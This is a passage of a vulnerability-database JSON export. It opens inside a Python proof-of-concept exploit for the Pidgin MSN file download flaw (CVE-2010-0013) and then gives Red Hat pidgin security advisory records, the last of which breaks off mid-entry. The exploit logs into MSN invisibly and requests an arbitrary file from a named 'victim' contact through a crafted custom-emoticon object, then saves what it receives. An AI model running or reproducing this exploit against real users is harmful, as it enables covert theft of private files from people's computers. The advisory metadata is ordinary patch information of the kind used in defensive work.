global_client.session_id:\r\n\t\t# first blob is control, we &#34;squeeze&#34; it and keep only the second one\r\n\t\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\t\t#print &#34;Got Control blob in our connection (session_id : %d, blob_id: %d)&#34;%(session_id, blob_id)\r\n\t\t\tglobal_client.GOT_CONTROL_BLOB = True\r\n\t\telse:\r\n\t\t\t# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it\r\n\t\t\tif global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):\r\n\t\t\t\tcurrent_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]\r\n\t\t\t\tprint &#34;Current : %d, total: %d (%d%%)\\r&#34;%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)),\r\n\t\t\t\tsys.stdout.flush()\r\n\r\n\r\ndef error_handler(self, error_type, error):\r\n\t# __on_user_invitation_failed, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \\\r\n\terror == pymsn.event.ContactInviteError.NOT_AVAILABLE:\r\n\t\tprint &#34;[*] ERROR, contact didn&#39;t accept our invite, probably because it is disconnected/invisible&#34;\r\n\t\tquit()\r\n\t# __on_message_undelivered, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.MESSAGE and \\\r\n\terror == pymsn.event.MessageError.DELIVERY_FAILED:\r\n\t\tprint &#34;[*] ERROR, couldn&#39;t send message, probably because contact is disconnected/invisible&#34;\r\n\t\tquit()\r\n\tprint &#34;[*] Unhandled error, error_type : %d , error : %d&#34;%(error_type, error)\r\n\tquit()\r\n\t\r\nclass MyClient(pymsn.Client):\r\n\tdef __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):\r\n\t\t# callback to quit\r\n\t\tself.quit = quit\r\n\t\t# victim from whom we request the file\r\n\t\tself.victim = victim\r\n\t\t# just list contacts for this account\r\n\t\tself.list_only = list_only\r\n\t\t# file we request\r\n\t\tself.filename = filename\r\n\t\t# to calculate download duration and speed\r\n\t\tself.begin = 0\r\n\t\tself.end = 0\r\n\t\t# session_id of the connection to retrieve the file\r\n\t\tself.session_id = 0\r\n\t\t# have we already seen the &#34;control blob&#34; for this connection\r\n\t\tself.GOT_CONTROL_BLOB = False\r\n\t\tpymsn.Client.__init__(self, server)\r\n\t\t# REALLY REALLY HACKISH\r\n\t\t# if contact is disconnected/invisible, a &#34;NotImplementedError&#34; exception is raised\r\n\t\t# and it can&#39;t be caught AFAIK so it needs to be redefined here\r\n\t\t# handler_class should be SwitchboardClient\r\n\t\tfor handler_class, extra_args in self._switchboard_manager._handlers_class:\r\n\t\t\thandler_class._on_error = error_handler\r\n\r\n\r\n\r\nclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore):\r\n\tdef __compute_data_hash(self, data):\r\n\t\tdigest = hashlib.sha1()\r\n\t\tdata.seek(0, 0)\r\n\t\tread_data = data.read(1024)\r\n\t\twhile len(read_data) &#62; 0:\r\n\t\t\tdigest.update(read_data)\r\n\t\t\tread_data = data.read(1024)\r\n\t\tdata.seek(0, 0)\r\n\t\treturn digest.digest()\r\n\r\n\t# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because\r\n\t# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)\r\n\tdef _outgoing_session_transfer_completed(self, session, data):\r\n\t\thandle_id, callback, errback, msn_object = self._outgoing_sessions[session] \r\n\t\tmsn_object._data_sha = self.__compute_data_hash(data) \t \r\n\t\tsuper(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)\r\n\r\nclass ClientEventHandler(pymsn.event.ClientEventInterface):\r\n\t\t\t\r\n\tdef on_client_error(self, error_type, error):\r\n\t\tif error_type == pymsn.event.ClientErrorType.AUTHENTICATION:\r\n\t\t\t print &#34;[+] Authentication failed, bad login/password&#34;\r\n\t\t\t self._client.quit()\r\n\t\telse:\r\n\t\t\t print &#34;[*] ERROR :&#34;, error_type, &#34; -&#62;&#34;, error\r\n\t\t\t \r\n\tdef on_client_state_changed(self, state):\r\n\t\t#print &#34;State changed to %s&#34; % state\r\n\t\tif state == pymsn.client.ClientState.CLOSED:\r\n\t\t\tprint &#34;[+] Connection to server closed&#34;\r\n\t\t\tself._client.quit()\r\n \r\n\t\tif state == pymsn.client.ClientState.CONNECTING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint &#34;[+] Connecting to server&#34;\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.AUTHENTICATING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint &#34;[+] Authentication in progress&#34;\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.SYNCHRONIZING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint &#34;[+] Synchronisation in progress&#34;\r\n\t\t\tself.current_state = state\r\n\r\n\t\tif state == pymsn.client.ClientState.OPEN:\r\n\t\t\tprint &#34;[+] OK, all done, ready to proceed&#34;\r\n\t\t\tself._client.profile.presence = pymsn.Presence.INVISIBLE\r\n\t\t\tcontact_dict = {}\r\n\t\t\tfor i in self._client.address_book.contacts:\r\n\t\t\t\tcontact_dict[i.account] = i\r\n\t\t\tif self._client.list_only:\r\n\t\t\t\tfor (k,v) in contact_dict.items():\r\n\t\t\t\t\tprint k+&#34; (&#34;+v.display_name+&#34;)&#34;\r\n\t\t\t\tself._client.quit()\r\n\t\t\telse:\r\n\t\t\t\tif self._client.victim not in contact_dict.keys():\r\n\t\t\t\t\tprint &#34;[*] Error, contact %s not in your contact list&#34;%self._client.victim\r\n\t\t\t\t\tself._client.quit()\r\n\t\t\t\telse: \r\n\t\t\t\t\tcontact = contact_dict[self._client.victim]\r\n\t\t\t\t\tstore = MyMSNObjectStore(self._client)\r\n\t\t\t\t\tobject = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, &#39;AAA=&#39;,&#39;2jmj7l5rSw0yVb/vlWAYkK/YBwk=&#39;)\r\n\t\t\t\t\tprint &#34;[+] Sending request for file \\&#34;%s\\&#34; to \\&#34;%s\\&#34;&#34;%(self._client.filename, self._client.victim)\r\n\t\t\t\t\tself._client.begin = time.time()\r\n\t\t\t\t\tstore.request(object, [handle_answer, self._client])\r\n\t\t\t\t\t# at this moment, we got only one session_id, the one we will use to request the file\r\n\t\t\t\t\tfor k in store._outgoing_sessions.keys():\r\n\t\t\t\t\t\tprint &#34;[+] Using session_id %d&#34;%k._id\r\n\t\t\t\t\t\tself._client.session_id = k._id\r\n\t\t\t\t\t# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv\r\n\t\t\t\t\t# if no file transfer received from the victim after TIMEOUT seconds, quit\r\n\t\t\t\t\tgobject.timeout_add(TIMEOUT*1000, check_if_succeeds)\r\n\r\n\tdef __init__(self, client):\r\n\t\tself.current_state = None\r\n\t\tpymsn.event.ClientEventInterface.__init__(self, client)\r\n\r\n\r\nif __name__ == &#39;__main__&#39;:\r\n\tprint &#34;***********************************************************\\n&#34;\r\n\tprint &#34;Pidgin MSN file download vulnerability (CVE-2010-0013)\\n&#34;\r\n\tprint &#34;Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\\n&#34;\r\n\tprint &#34;***********************************************************\\n&#34;\r\n\r\n\tusage = &#34;Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] &#34;\r\n\tparser = OptionParser(usage=usage)\r\n\tparser.add_option(&#34;-f&#34;, &#34;--file&#34;, dest=&#34;filename&#34;, default=None,\r\n\t\t\t\t\t help=&#34;File requested to remote contact&#34;)\r\n\tparser.add_option(&#34;-o&#34;, &#34;--output&#34;, dest=&#34;output_file&#34;, default=None,\r\n\t\t\t\t\t help=&#34;Where to write received file, STDOUT otherelse&#34;)\r\n\tparser.add_option(&#34;-a&#34;, &#34;--account&#34;, dest=&#34;account&#34;, default=None,\r\n\t\t\t\t\t help=&#34;MSN account to use&#34;)\r\n\tparser.add_option(&#34;-c&#34;, &#34;--contact&#34;, dest=&#34;contact&#34;, default=None,\r\n\t\t\t\t\t help=&#34;Contact to request file from&#34;)\r\n\tparser.add_option(&#34;-l&#34;, &#34;--list&#34;, dest=&#34;list_only&#34;, action=&#34;store_true&#34;, default=False,\r\n\t\t\t\t\t help=&#34;Just print contact list for your account and exit&#34;)\r\n\t\r\n\t(options, args) = parser.parse_args()\r\n\tif not options.filename or not options.account or not options.contact:\r\n\t\tif not (options.account and options.list_only):\r\n\t\t\tprint &#34;Error, parameter missing&#34;\r\n\t\t\tparser.print_help()\r\n\t\t\tsys.exit(-1)\r\n\r\n\tif options.output_file != None:\r\n\t\ttry:\r\n\t\t\tFD_OUT = open(options.output_file,&#34;wb&#34;)\r\n\t\texcept Exception,e:\r\n\t\t\tprint &#34;Cannot open file %s (%s)&#34;%(options.output_file, e)\r\n\t\t\tsys.exit(-1)\r\n\r\n\tMAINLOOP = gobject.MainLoop()\r\n\r\n\tdef sigterm_cb():\r\n\t\tgobject.idle_add(quit)\r\n\r\n\tsignal.signal(signal.SIGTERM, sigterm_cb)\r\n\r\n\tlogging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug\r\n\tserver = (SERVER_ADDRESS, SERVER_PORT)\r\n\tclient = MyClient(server, quit, options.contact, options.filename, options.list_only)\r\n\tglobal_client = client\r\n\tclient_events_handler = ClientEventHandler(client)\r\n\tprint &#34;Please enter the password for the account \\&#34;%s\\&#34;&#34;%options.account\r\n\ttry:\r\n\t\tpasswd = getpass.getpass()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n\r\n\tlogin_info = (options.account, passwd)\r\n\tclient.login(*login_info)\r\n\ttry:\r\n\t\tMAINLOOP.run()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67539", "status": "cve,poc"}], "redhat": [{"lastseen": "2017-09-08T08:04:23", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "finch-2.6.6-1.el4.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "pidgin-perl-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-2.6.6-1.el4.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-perl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-devel-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "pidgin-2.6.6-1.el4.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "pidgin-devel-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "finch-devel-2.6.6-1.el4.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "src", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "finch-2.6.6-1.el4.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "pidgin-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "finch-devel-2.6.6-1.el4.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "pidgin-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "finch-2.6.6-1.el4.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "finch-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "libpurple-perl-2.6.6-1.el4.ppc.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "libpurple-2.6.6-1.el4.ppc.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "pidgin-perl-2.6.6-1.el4.ppc.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "pidgin-devel-2.6.6-1.el4.ppc.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "libpurple-tcl-2.6.6-1.el4.ppc.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "libpurple-devel-2.6.6-1.el4.ppc.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "finch-devel-2.6.6-1.el4.ppc.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "pidgin-2.6.6-1.el4.ppc.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ppc", "packageFilename": "finch-2.6.6-1.el4.ppc.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "libpurple-2.6.6-1.el5.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "pidgin-2.6.6-1.el5.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "libpurple-perl-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "finch-2.6.6-1.el5.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "pidgin-perl-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "src", "packageFilename": "pidgin-2.6.6-1.el5.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "pidgin-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "libpurple-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "finch-2.6.6-1.el5.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "libpurple-devel-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "pidgin-devel-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "i386", "packageFilename": "finch-devel-2.6.6-1.el5.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "finch-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could send a\nspecially-crafted INVITE request that would cause a denial of service\n(memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation,\nwhen using multi-user chat. If a Finch user in a multi-user chat session\nwere to change their nickname to contain the HTML \"br\" element, it would\ncause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project\nfor responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon\nimages. A remote attacker could flood the victim with emoticon images\nduring mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which\ncorrect these issues. Pidgin must be restarted for this update to take\neffect.", "reporter": "RedHat", "published": "2010-02-18T05:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "redhat", "title": "(RHSA-2010:0115) Moderate: pidgin security update", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0277", "CVE-2010-0420", "CVE-2010-0423"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:48:27", "id": "RHSA-2010:0115", "href": "https://access.redhat.com/errata/RHSA-2010:0115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-09T07:20:04", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4_8.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin", "packageFilename": 